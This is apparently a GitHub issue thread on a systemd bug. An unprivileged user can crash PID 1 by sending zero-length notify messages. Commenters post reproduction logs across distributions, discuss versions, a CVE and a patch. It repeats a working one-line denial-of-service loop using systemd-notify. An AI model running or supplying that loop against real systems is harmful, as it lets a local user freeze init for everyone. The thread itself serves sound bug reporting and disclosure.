Assertion failure when PID 1 receives a zero-length message over notify socket #4234
Nothing seems to break when I do the same on systemd v229.
I do get "systemd[1]: Cannot find unit for notify message of PID 8688" in the logs.
Is your PoC correct?
Okay, I managed to trigger this on v229 by changing the PoC to the following:
while true; do NOTIFY_SOCKET=/run/systemd/notify systemd-notify ""; done
While it threw the "Cannot find unit" messages for a bit, in less than 30 seconds that changed to:
systemd[1]: Assertion 'n > 0' failed at ../src/core/manager.c:1501, function manager_invoke_notify_message(). Aborting.
systemd[1]: Caught <ABRT>, dumped core as pid 10335.
Ubuntu, 16.04 (systemd v229), with the while loop PoC:
Sep 28 22:21:36 odyssey systemd[1]: Cannot find unit for notify message of PID 21076.
Sep 28 22:21:36 odyssey systemd[1]: Cannot find unit for notify message of PID 21077.
Sep 28 22:21:36 odyssey systemd[1]: Assertion 'n > 0' failed at ../src/core/manager.c:1501, function manager_invoke_notify_message(). Aborting.
Sep 28 22:21:37 odyssey systemd[1]: Caught , dumped core as pid 21079.
Sep 28 22:21:37 odyssey systemd[1]: Freezing execution.
(However, no adverse effect on the running system)
On Ubuntu 16.04.1 with systemd 229-4ubuntu8 installed, as a non-root user:
$ NOTIFY_SOCKET=/run/systemd/notify systemd-notify ""
$ sudo systemctl list-units -t service
Failed to list units: Connection timed out
On Arch Linux with 231 (with the while
poc):
Sep 29 00:06:07 arch-64-glaukon systemd[1]: Assertion 'n > 0' failed at src/core/manager.c:1593, function manager_invoke_notify_message(). Aborting.
Sep 29 00:06:07 arch-64-glaukon systemd-coredump[9495]: Due to PID 1 having crashed coredump collection will now be turned off.
Sep 29 00:06:07 arch-64-glaukon systemd[1]: Caught <ABRT>, dumped core as pid 9494.
Sep 29 00:06:07 arch-64-glaukon systemd[1]: Freezing execution.
Sep 29 00:06:08 arch-64-glaukon systemd-coredump[9495]: Detected coredump of the journal daemon or PID 1, diverted to /var/lib/systemd/coredump/core.systemd.0.f9b64f9e7c164d80a53
user root by (uid=1000)
This seems to be denial of service issue crossing the user boundary, thus making it a security vulnerability. Please consider handling it as such.
It is unfortunate that this was not handled using a 'responsible disclosure' process. A CVE was requested post publication, though: http://www.openwall.com/lists/oss-security/2016/09/28/9
It triggers the bug for me, it says
Sep 28 18:49:11 Vortex systemd-coredump[2216]: Due to PID 1 having crashed coredump collection will now be turned off.
Sep 28 18:49:11 Vortex systemd[1]: Caught , dumped core as pid 2215.
Sep 28 18:49:11 Vortex systemd[1]: Freezing execution.
Sep 28 18:49:11 Vortex systemd-coredump[2216]: Detected coredump of the journal daemon or PID 1, diverted to /var/lib/systemd/coredump/core.systemd.0.26728e5633c9450facfa4e5f6d9f3807.2215.1475106551000000.lz4.
This patch (just one line), changing it from assert(n > 0) to assert(n >= 0) causes my system to not suffer from this bug. Hopefully somebody more knowledgeable about systemd will know whether or not more needs to be done than this to properly fix this issue.
assert.patch.txt
Hi,
I tried to reproduce the PoC attack in a Debian Jessie 8.6 vm running 'systemd 215-17+deb8u5' by executing the systemd-notify in "while true" loop. For what it's worth to my understanding no complete crash occurred.
systemd-journald.service and systemd-logind.servide did crash indeed. Nevertheless I was able to restart sshd via systemdctl and accept connections.
The assert mentioned in 5ba6985#diff-ab78220e12703ee63fa1e6a2caa16bebR1325 seems to be present in the installed debian package https://sources.debian.net/src/systemd/215-17%2Bdeb8u5/src/core/manager.c/?hl=1567#L1487
I just ran the following command as a regular user on my Linux Mint 18 (Sarah), and got this:
$ while true; do NOTIFY_SOCKET=/run/systemd/notify systemd-notify ""; done
Failed to notify init system: Connection refused
Failed to notify init system: Connection refused
Failed to notify init system: Connection refused
Failed to notify init system: Connection refused
Failed to notify init system: Connection refused
^C%
$ uname -a
Linux gz-Latitude-E7240 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
I also ran the same command as root and got the same result. I don't see any issues with my system after this. I am unable to replicate the bug.
Possibly this was the real cause of this bug? d875aa8
That's only in v219 which would explain why it doesn't crash on jessie which has v215 (I also couldn't make the POC work there).
Older distros are affected differently I think: no assertion is triggered but manager_dispatch_notify_fd() still returns an error which has the bad side effect to disable the notification handler completely, see https://github.com/systemd/systemd/blob/v215/src/core/manager.c#L1398.
All services using the Watchdog feature will silently fail to notify PID1. The latter will consider the service dead and will kill them.
See #4240 for a possible fix.
@fbuihuu I can confirm that finding. With v215 from Debian, logind and journald fail with watchdog errors. Other then that the system remained in a usable state. I could start/stop service, reboot in a controlled manner, etc.
Reported the issue to Redhat just so they were aware, though I'm sure they already are.
Reproduced on ubuntu 15.10, which has systemd on v225 so not quite sure if v219's update is the issue. Could this be the problem? 5ba6985#diff-ab78220e12703ee63fa1e6a2caa16bebR1325
Will take a look at this further tonight and see if I can help.
Report the issue in Fedora 24 Desktop / systemd 229
[soul@RyujinJakka Sandbox]$ uname -a
Linux RyujinJakka 4.7.4-200.fc24.x86_64 #1 SMP Thu Sep 15 18:42:09 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
[soul@RyujinJakka Sandbox]$ systemctl --version
systemd 229
+PAM +AUDIT +SELINUX +IMA -APPARMOR +SMACK +SYSVINIT +UTMP +LIBCRYPTSETUP +GCRYPT +GNUTLS +ACL +XZ +LZ4 +SECCOMP +BLKID +ELFUTILS +KMOD +IDN
[soul@RyujinJakka Sandbox]$ while true; do NOTIFY_SOCKET=/run/systemd/notify systemd-notify ""; done
^C
[soul@RyujinJakka Sandbox]$ sudo systemctl list-units -t service
Failed to list units: Failed to activate service 'org.freedesktop.systemd1': timed out
The calls to systemd based commands (systemd-nspaw, systemctl,reboot, etc) hangs and later shows a timeout message, no general system degradation (screenshots http://wp.me/p7FGzd-49)
Hangs on Reboot and shutdown
Can reproduce on Debian stretch, with systemd 231-4
> apt-cache policy systemd
systemd:
Installed: 231-4
Candidate: 231-4
Version table:
*** 231-4 500
500 http://ftp.debian.org/debian stretch/main amd64 Packages
100 /var/lib/dpkg/status
230-7~bpo8+2 100
100 http://ftp.debian.org/debian jessie-backports/main amd64 Packages
215-17+deb8u5 500
500 http://ftp.debian.org/debian jessie/main amd64 Packages
root / # env NOTIFY_SOCKET=/run/systemd/notify systemd-notify ""
root / #
Broadcast message from systemd-journald@local (Sun 2016-10-02 21:11:49 CEST):
systemd[1]: Caught <ABRT>, dumped core as pid 5439.
Message from syslogd@local at Oct 2 21:11:49 ...
systemd[1]: Caught <ABRT>, dumped core as pid 5439.
Broadcast message from systemd-journald@local (Sun 2016-10-02 21:11:49 CEST):
systemd[1]: Freezing execution.
Message from syslogd@local at Oct 2 21:11:49 ...
systemd[1]: Freezing execution.
From syslog
Oct 2 21:11:49 local systemd[1]: Assertion 'n > 0' failed at ../src/core/manager.c:1593, function manager_invoke_notify_message(). Aborting.
Oct 2 21:11:49 local systemd[1]: Caught <ABRT>, dumped core as pid 5439.
Oct 2 21:11:49 local systemd[1]: Freezing execution.
And latter messages are, for example, these:
# systemctl
Failed to list units: Failed to activate service 'org.freedesktop.systemd1': timed out
# systemctl start org.freedesktop.systemd1
Failed to start org.freedesktop.systemd1.service: Failed to activate service 'org.freedesktop.systemd1': timed out
See system logs and 'systemctl status org.freedesktop.systemd1.service' for details.
# systemctl status org.freedesktop.systemd1.service
Failed to get properties: Failed to activate service 'org.freedesktop.systemd1': timed out
@smarek The Debian package was fixed in 231-9. It's currently in unstable and should reach testing in 2-3 days. The version in unstable, v215, is not directly affected by this crash.
abaza@abaza-VirtualBox:~$ systemctl --version
systemd 229
+PAM +AUDIT +SELINUX +IMA +APPARMOR +SMACK +SYSVINIT +UTMP +LIBCRYPTSETUP +GCRYPT +GNUTLS +ACL +XZ -LZ4 +SECCOMP +BLKID +ELFUTILS +KMOD -IDN
abaza@abaza-VirtualBox:~$ uname -a
Linux abaza-VirtualBox 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
abaza@abaza-VirtualBox:~$ while true; do NOTIFY_SOCKET=/run/systemd/notify systemd-notify ""; done
^C
abaza@abaza-VirtualBox:~$ sudo systemctl list-units -t service
[sudo] password for abaza:
UNIT LOAD ACTIVE SUB JOB DESCRIPTION
accounts-daemon.service loaded active running Accounts Service
acpid.service loaded active running ACPI event daemon
alsa-restore.service loaded active exited Save/Restore Sound Card State
anacron.service loaded active running Run anacron jobs
apparmor.service loaded active exited LSB: AppArmor initialization
apport.service loaded active exited LSB: automatic crash report generation
apt-daily.service loaded activating start start Daily apt activities
avahi-daemon.service loaded active running Avahi mDNS/DNS-SD Stack
colord.service loaded active running Manage, Install and Generate Color Profiles
console-setup.service loaded active exited Set console keymap
cron.service loaded active running Regular background program processing daemon
cups-browsed.service loaded active running Make remote CUPS printers available locally
...............................
There is no effect
systemd fails an assertion in manager_invoke_notify_message when a zero-length message is received over /run/systemd/notify. This allows a local user to perform a denial-of-service attack against PID 1.
Proof-of-concept: